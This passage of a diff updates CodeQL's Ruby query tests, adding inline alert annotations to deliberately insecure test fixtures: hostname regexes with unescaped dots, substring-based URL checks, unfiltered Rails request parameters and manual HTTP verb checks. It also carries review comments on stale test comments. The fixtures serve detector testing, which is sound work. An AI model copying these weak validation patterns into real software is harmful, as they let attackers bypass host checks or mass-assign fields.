ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:11:14:11:42 | ...[...] | provenance | | 
@@ -32,11 +40,3 @@ nodes | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | semmle.label | call to env | | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | semmle.label | ...[...] | subpaths -#select -| ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | ManuallyCheckHttpVerb.rb:19:14:19:35 | call to request_method | ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | ManuallyCheckHttpVerb.rb:27:14:27:27 | call to method | ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... 
| Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | ManuallyCheckHttpVerb.rb:35:14:35:39 | call to raw_request_method | ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | ManuallyCheckHttpVerb.rb:51:16:51:44 | call to request_method_symbol | ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | 
diff --git a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.qlref b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.qlref index 463c21cd0f29..455d02aef04c 100644 --- a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.qlref +++ b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.qlref @@ -1 +1,2 @@ -experimental/manually-check-http-verb/ManuallyCheckHttpVerb.ql \ No newline at end of file +query: experimental/manually-check-http-verb/ManuallyCheckHttpVerb.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.rb b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.rb index 055e9d986382..0dc9df656038 100644 --- a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.rb +++ b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.rb 
@@ -1,39 +1,39 @@ class ExampleController < ActionController::Base # Should find def example_action - if request.get? + if request.get? # $ Alert Resource.find(id: params[:example_id]) end end # Should find def other_action - method = request.env['REQUEST_METHOD'] - if method == "GET" + method = request.env['REQUEST_METHOD'] # $ Source + if method == "GET" # $ Alert Resource.find(id: params[:id]) end end # Should find def foo - method = request.request_method - if method == "GET" + method = request.request_method # $ Source + if method == "GET" # $ Alert Resource.find(id: params[:id]) end end # Should find def bar - method = request.method - if method == "GET" + method = request.method # $ Source + if method == "GET" # $ Alert Resource.find(id: params[:id]) end end # Should find def baz - method = request.raw_request_method - if method == "GET" + method = request.raw_request_method # $ Source + if method == "GET" # $ Alert Resource.find(id: params[:id]) end end @@ -48,15 +48,15 @@ def baz2 # Should find def foobarbaz - method = request.request_method_symbol - if method == :GET + method = request.request_method_symbol # $ Source + if method == :GET # $ Alert Resource.find(id: params[:id]) end end # Should find def resource_action - case request.env['REQUEST_METHOD'] + case request.env['REQUEST_METHOD'] # $ Alert when "GET" Resource.find(id: params[:id]) when "POST" diff --git a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected index 4f72a24cee77..6dd6637abd4d 100644 --- a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected +++ b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected 
@@ -1,3 +1,8 @@ +#select +| WeakParams.rb:5:28:5:59 | ...[...] | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:10:28:10:57 | ...[...] | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:15:28:15:45 | ...[...] | WeakParams.rb:15:28:15:39 | call to POST | WeakParams.rb:15:28:15:45 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:20:28:20:44 | ...[...] | WeakParams.rb:20:28:20:38 | call to GET | WeakParams.rb:20:28:20:44 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | edges | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] 
| provenance | | | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | provenance | | 
@@ -13,8 +18,3 @@ nodes | WeakParams.rb:20:28:20:38 | call to GET | semmle.label | call to GET | | WeakParams.rb:20:28:20:44 | ...[...] | semmle.label | ...[...] | subpaths -#select -| WeakParams.rb:5:28:5:59 | ...[...] | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:10:28:10:57 | ...[...] | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:15:28:15:45 | ...[...] | WeakParams.rb:15:28:15:39 | call to POST | WeakParams.rb:15:28:15:45 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:20:28:20:44 | ...[...] | WeakParams.rb:20:28:20:38 | call to GET | WeakParams.rb:20:28:20:44 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. 
It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | diff --git a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.qlref b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.qlref index 5350e4bf40a5..96a41103dd44 100644 --- a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.qlref +++ b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.qlref @@ -1 +1,2 @@ -experimental/weak-params/WeakParams.ql \ No newline at end of file +query: experimental/weak-params/WeakParams.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.rb b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.rb index a5edef2e6dc2..89a495a40963 100644 --- a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.rb +++ b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.rb @@ -2,22 +2,22 @@ class TestController < ActionController::Base # Should catch def create - TestObject.create(foo: request.request_parameters[:foo]) + TestObject.create(foo: request.request_parameters[:foo]) # $ Alert end # Should catch def create_query - TestObject.create(foo: request.query_parameters[:foo]) + TestObject.create(foo: request.query_parameters[:foo]) # $ Alert end # Should catch def update_unsafe - TestObject.update(foo: request.POST[:foo]) + TestObject.update(foo: request.POST[:foo]) # $ Alert end # Should catch def update_unsafe_get - TestObject.update(foo: request.GET[:foo]) + TestObject.update(foo: request.GET[:foo]) # $ Alert end # Should not catch diff --git a/ruby/ql/test/query-tests/metrics/FLines/FLines.qlref b/ruby/ql/test/query-tests/metrics/FLines/FLines.qlref index 315464375988..53ed649c7e4c 100644 --- a/ruby/ql/test/query-tests/metrics/FLines/FLines.qlref +++ b/ruby/ql/test/query-tests/metrics/FLines/FLines.qlref 
@@ -1 +1 @@
-queries/metrics/FLines.ql
\ No newline at end of file
+query: queries/metrics/FLines.ql
diff --git a/ruby/ql/test/query-tests/metrics/FLines/FLinesOfCode.qlref b/ruby/ql/test/query-tests/metrics/FLines/FLinesOfCode.qlref
index cb4dd2b8767c..c77e9739c0ac 100644
--- a/ruby/ql/test/query-tests/metrics/FLines/FLinesOfCode.qlref
+++ b/ruby/ql/test/query-tests/metrics/FLines/FLinesOfCode.qlref
@@ -1 +1 @@
-queries/metrics/FLinesOfCode.ql
\ No newline at end of file
+query: queries/metrics/FLinesOfCode.ql
diff --git a/ruby/ql/test/query-tests/metrics/FLines/FLinesOfComments.qlref b/ruby/ql/test/query-tests/metrics/FLines/FLinesOfComments.qlref
index 766ae4bcc590..3f0bff7371d2 100644
--- a/ruby/ql/test/query-tests/metrics/FLines/FLinesOfComments.qlref
+++ b/ruby/ql/test/query-tests/metrics/FLines/FLinesOfComments.qlref
@@ -1 +1 @@
-queries/metrics/FLinesOfComments.ql
\ No newline at end of file
+query: queries/metrics/FLinesOfComments.ql
diff --git a/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.qlref b/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.qlref
index f2a94b28c407..453e0a3f399f 100644
--- a/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.qlref
+++ b/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.qlref
@@ -1 +1,2 @@
-experimental/performance/UseDetect.ql
+query: experimental/performance/UseDetect.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.rb b/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.rb
index e1d2d9b91ba0..2c2602e72e62 100644
--- a/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.rb
+++ b/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.rb
@@ -2,14 +2,14 @@ class DetectTest def test # These are bad - [].select { |i| true }.first - [].select { |i| true }.last - [].select { |i| true }[0] - [].select { |i| true }[-1] - [].filter { |i| true }.first - [].find_all { |i| true }.last + [].select { |i| true }.first # $ Alert + [].select { |i| true }.last # $ Alert + [].select { |i| true }[0] # $ Alert + [].select { |i| true }[-1] # $ Alert + [].filter { |i| true }.first # $ Alert + [].find_all { |i| true }.last # $ Alert selection1 = [].select { |i| true } - selection1.first + selection1.first # $ Alert # These are good [].select("").first # Selecting a string diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref index 7fd45d159ce4..93a6200ff175 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/IncompleteHostnameRegExp.ql \ No newline at end of file +query: queries/security/cwe-020/IncompleteHostnameRegExp.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb index 5a5c96692ce0..32aa8ad9491d 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb 
@@ -1,6 +1,6 @@ -UNSAFE_REGEX1 = /(www|beta).example.com\// -UNSAFE_REGEX2 = Regexp.compile("(www|beta).example.com/") -UNSAFE_REGEX3 = Regexp.new("(www|beta).example.com/") +UNSAFE_REGEX1 = /(www|beta).example.com\// # $ Alert +UNSAFE_REGEX2 = Regexp.compile("(www|beta).example.com/") # $ Alert +UNSAFE_REGEX3 = Regexp.new("(www|beta).example.com/") # $ Alert SAFE_REGEX = /(www|beta)\.example\.com\// def unsafe diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb index 7041e4dc9c46..7d29b530acf1 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb 
@@ -1,31 +1,31 @@ def foo /^http:\/\/example.com/; # OK - /^http:\/\/test.example.com/; # NOT OK + /^http:\/\/test.example.com/; # NOT OK # $ Alert /^http:\/\/test\.example.com/; # OK - /^http:\/\/test.example.net/; # NOT OK - /^http:\/\/test.(example-a|example-b).com/; # NOT OK - /^http:\/\/(.+).example.com\//; # NOT OK + /^http:\/\/test.example.net/; # NOT OK # $ Alert + /^http:\/\/test.(example-a|example-b).com/; # NOT OK # $ Alert + /^http:\/\/(.+).example.com\//; # NOT OK # $ Alert /^http:\/\/(\.+)\.example.com/; # OK - /^http:\/\/(?:.+)\.test\.example.com\//; # NOT OK - /^http:\/\/test.example.com\/(?:.*)/; # OK - Regexp.new("^http://test.example.com"); # NOT OK - if (s.match("^http://test.example.com")); end # NOT OK + /^http:\/\/(?:.+)\.test\.example.com\//; # NOT OK # $ Alert + /^http:\/\/test.example.com\/(?:.*)/; # OK # $ Alert + Regexp.new("^http://test.example.com"); # NOT OK # $ Alert + if (s.match("^http://test.example.com")); end # NOT OK # $ Alert - Regexp.new(id(id(id("^http://test.example.com")))); # NOT OK + Regexp.new(id(id(id("^http://test.example.com")))); # NOT OK # $ Alert - Regexp.new(`test.example.com$`); # NOT OK + Regexp.new(`test.example.com$`); # NOT OK # $ Alert - hostname = '^test.example.com'; # NOT OK - Regexp.new("#{hostname}$"); + hostname = '^test.example.com'; # NOT OK # $ Alert + Regexp.new("#{hostname}$"); # $ Alert - domain = { hostname: 'test.example.com$' }; # NOT OK + domain = { hostname: 'test.example.com$' }; # NOT OK # $ Alert Regexp.new(domain[:hostname]); - convert1({ hostname: 'test.example.com$' }); # NOT OK + convert1({ hostname: 'test.example.com$' }); # NOT OK # $ Alert domains = [ { hostname: 'test.example.com$' } ]; # NOT OK - but not flagged due to limitations of TypeTracking. 
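Review bot: `/^http:\/\/test.example.com\/(?:.*)/; # OK # $ Alert` now asserts an alert on a line whose comment still says OK. The host part has an unescaped `.`, so the alert looks correct and the `# OK` is probably stale; change it to `# NOT OK # $ Alert`, or, if the result is really unwanted, record it as `# $ SPURIOUS: Alert`. The same contradiction appears on the `# kinda OK` line in the `@@ -56,7 +56,7 @@` hunk of this file and in the `@@ -49,28 +49,28 @@` hunk of tst-IncompleteUrlSubstringSanitization.rb, where `x.index("secure.com") === nil; # OK # $ Alert` disagrees with the identical expression marked `# NOT OK # $ Alert` in that file's first hunk. Left as is, the test files document a weak hostname check as acceptable while the expectation says the opposite.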
@@ -34,18 +34,18 @@ def foo domains.map{ |d| convert2(d) }; /^(.+\.(?:example-a|example-b)\.com)\//; # NOT OK - /^(https?:)?\/\/((service|www).)?example.com(?=$|\/)/; # NOT OK - /^(http|https):\/\/www.example.com\/p\/f\//; # NOT OK - /^(http:\/\/sub.example.com\/)/i; # NOT OK - /^https?:\/\/api.example.com/; # NOT OK - Regexp.new('^http://localhost:8000|' + "^https?://.+\\.example\\.com/"); # NOT OK + /^(https?:)?\/\/((service|www).)?example.com(?=$|\/)/; # NOT OK # $ Alert + /^(http|https):\/\/www.example.com\/p\/f\//; # NOT OK # $ Alert + /^(http:\/\/sub.example.com\/)/i; # NOT OK # $ Alert + /^https?:\/\/api.example.com/; # NOT OK # $ Alert + Regexp.new('^http://localhost:8000|' + "^https?://.+\\.example\\.com/"); # NOT OK # $ Alert Regexp.new("^http[s]?:\/\/?sub1\\.sub2\\.example\\.com\/f\/(.+)"); # NOT OK - /^https:\/\/[a-z]*.example.com$/; # NOT OK - Regexp.compile('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); # NOT OK + /^https:\/\/[a-z]*.example.com$/; # NOT OK # $ Alert + Regexp.compile('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); # NOT OK # $ Alert /^(example.dev|example.com)/; # OK - Regexp.new('^http://localhost:8000|' + "^https?://.+.example\\.com/"); # NOT OK + Regexp.new('^http://localhost:8000|' + "^https?://.+.example\\.com/"); # NOT OK # $ Alert primary = 'example.com$'; Regexp.new('test.' + primary); # NOT OK, but not detected @@ -56,7 +56,7 @@ def foo /^http:\/\/(..|...)\.example\.com\/index\.html/; # OK, wildcards are intentional /^http:\/\/.\.example\.com\/index\.html/; # OK, the wildcard is intentional - /^(foo.example\.com|whatever)$/; # kinda OK - one disjunction doesn't even look like a hostname + /^(foo.example\.com|whatever)$/; # kinda OK - one disjunction doesn't even look like a hostname # $ Alert end def id(e); return e; end def convert1(domain) 
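Review bot: Lines the comments call `# NOT OK` but that carry no annotation, such as `/^(.+\.(?:example-a|example-b)\.com)\//; # NOT OK` and `Regexp.new('test.' + primary); # NOT OK, but not detected`, are accepted silently by the inline-expectations postprocess. Marking them `# $ MISSING: Alert` would keep these known false negatives machine-checked, so the test flags it once the query starts reporting them. The same applies to the `# NOT OK, but not flagged` lines in tst-IncompleteUrlSubstringSanitization.rb and to `/^www\.example\.com$/ # BAD: uses end-of-line anchors rather than end-of-string anchors` in missing_regexp_anchor.rb, assuming those results are not meant to come from a different query.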
@@ -78,4 +78,4 @@ def self.match?(x) end end -B.match?("^http://test.example.com") # NOT OK +B.match?("^http://test.example.com") # NOT OK # $ Alert diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref b/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref index dea02dce1538..077f367fe477 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/IncompleteUrlSubstringSanitization.ql +query: queries/security/cwe-020/IncompleteUrlSubstringSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.rb b/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.rb index dc6d49de57af..11094f6ee0b0 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.rb 
@@ -1,23 +1,23 @@ def test (x) x.index("internal") != nil; # NOT OK, but not flagged x.index("localhost") != nil; # NOT OK, but not flagged - x.index("secure.com") != nil; # NOT OK - x.index("secure.net") != nil; # NOT OK - x.index(".secure.com") != nil; # NOT OK + x.index("secure.com") != nil; # NOT OK # $ Alert + x.index("secure.net") != nil; # NOT OK # $ Alert + x.index(".secure.com") != nil; # NOT OK # $ Alert x.index("sub.secure.") != nil; # NOT OK, but not flagged x.index(".sub.secure.") != nil; # NOT OK, but not flagged - x.index("secure.com") === nil; # NOT OK - x.index("secure.com") === 0; # NOT OK - x.index("secure.com") >= 0; # NOT OK + x.index("secure.com") === nil; # NOT OK # $ Alert + x.index("secure.com") === 0; # NOT OK # $ Alert + x.index("secure.com") >= 0; # NOT OK # $ Alert - x.start_with?("https://secure.com"); # NOT OK - x.end_with?("secure.com"); # NOT OK + x.start_with?("https://secure.com"); # NOT OK # $ Alert + x.end_with?("secure.com"); # NOT OK # $ Alert x.end_with?(".secure.com"); # OK x.start_with?("secure.com/"); # OK x.index("secure.com/") === 0; # OK - x.include?("secure.com"); # NOT OK + x.include?("secure.com"); # NOT OK # $ Alert x.index("#") != nil; # OK x.index(":") != nil; # OK @@ -29,9 +29,9 @@ def test (x) x.index("some/path") != nil; # OK x.index("/index.html") != nil; # OK x.index(":template:") != nil; # OK - x.index("https://secure.com") != nil; # NOT OK - x.index("https://secure.com:443") != nil; # NOT OK - x.index("https://secure.com/") != nil; # NOT OK + x.index("https://secure.com") != nil; # NOT OK # $ Alert + x.index("https://secure.com:443") != nil; # NOT OK # $ Alert + x.index("https://secure.com/") != nil; # NOT OK # $ Alert x.index(".cn") != nil; # NOT OK, but not flagged x.index(".jpg") != nil; # OK 
@@ -49,28 +49,28 @@ def test (x) x.index("tar.gz") + offset; # OK x.index("tar.gz") - offset; # OK - x.index("https://example.internal") != nil; # NOT OK + x.index("https://example.internal") != nil; # NOT OK # $ Alert x.index("https://") != nil; # OK - x.start_with?("https://example.internal"); # NOT OK - x.index('https://example.internal.org') != 0; # NOT OK - x.index('https://example.internal.org') === 0; # NOT OK - x.end_with?("internal.com"); # NOT OK + x.start_with?("https://example.internal"); # NOT OK # $ Alert + x.index('https://example.internal.org') != 0; # NOT OK # $ Alert + x.index('https://example.internal.org') === 0; # NOT OK # $ Alert + x.end_with?("internal.com"); # NOT OK # $ Alert x.start_with?("https://example.internal:80"); # OK - x.index("secure.com") != nil; # NOT OK - x.index("secure.com") === nil; # OK - !(x.index("secure.com") != nil); # OK - !x.include?("secure.com"); # OK + x.index("secure.com") != nil; # NOT OK # $ Alert + x.index("secure.com") === nil; # OK # $ Alert + !(x.index("secure.com") != nil); # OK # $ Alert + !x.include?("secure.com"); # OK # $ Alert - if !x.include?("secure.com") # NOT OK + if !x.include?("secure.com") # NOT OK # $ Alert else doSomeThingWithTrustedURL(x); end x.start_with?("https://secure.com/foo/bar"); # OK - a forward slash after the domain makes prefix checks safe. - x.index("https://secure.com/foo/bar") >= 0 # NOT OK - the url can be anywhere in the string. - x.index("https://secure.com") >= 0 # NOT OK - x.index("https://secure.com/foo/bar-baz") >= 0 # NOT OK - the url can be anywhere in the string. + x.index("https://secure.com/foo/bar") >= 0 # NOT OK - the url can be anywhere in the string. # $ Alert + x.index("https://secure.com") >= 0 # NOT OK # $ Alert + x.index("https://secure.com/foo/bar-baz") >= 0 # NOT OK - the url can be anywhere in the string. # $ Alert end 
diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected index 4032d044fd86..94cdef1f29be 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected @@ -1,3 +1,7 @@ +#select +| impl/miss-anchor.rb:3:39:3:42 | name | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:2:12:2:15 | name | library input | impl/miss-anchor.rb:3:39:3:89 | ... !~ ... | checked | impl/miss-anchor.rb:3:48:3:88 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | +| impl/miss-anchor.rb:7:43:7:46 | name | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:6:12:6:15 | name | library input | impl/miss-anchor.rb:7:43:7:93 | ... !~ ... | checked | impl/miss-anchor.rb:7:52:7:92 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | +| impl/miss-anchor.rb:15:47:15:50 | name | impl/miss-anchor.rb:14:12:14:15 | name | impl/miss-anchor.rb:15:47:15:50 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:14:12:14:15 | name | library input | impl/miss-anchor.rb:15:47:15:97 | ... !~ ... | checked | impl/miss-anchor.rb:15:56:15:96 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | edges | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | provenance | | | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | provenance | | 
@@ -10,7 +14,3 @@ nodes | impl/miss-anchor.rb:14:12:14:15 | name | semmle.label | name | | impl/miss-anchor.rb:15:47:15:50 | name | semmle.label | name | subpaths -#select -| impl/miss-anchor.rb:3:39:3:42 | name | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:2:12:2:15 | name | library input | impl/miss-anchor.rb:3:39:3:89 | ... !~ ... | checked | impl/miss-anchor.rb:3:48:3:88 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | -| impl/miss-anchor.rb:7:43:7:46 | name | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:6:12:6:15 | name | library input | impl/miss-anchor.rb:7:43:7:93 | ... !~ ... | checked | impl/miss-anchor.rb:7:52:7:92 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | -| impl/miss-anchor.rb:15:47:15:50 | name | impl/miss-anchor.rb:14:12:14:15 | name | impl/miss-anchor.rb:15:47:15:50 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:14:12:14:15 | name | library input | impl/miss-anchor.rb:15:47:15:97 | ... !~ ... | checked | impl/miss-anchor.rb:15:56:15:96 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.qlref b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.qlref index 4b61fcc56d74..8de0d5036bb1 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/MissingFullAnchor.ql \ No newline at end of file +query: queries/security/cwe-020/MissingFullAnchor.ql +postprocess: 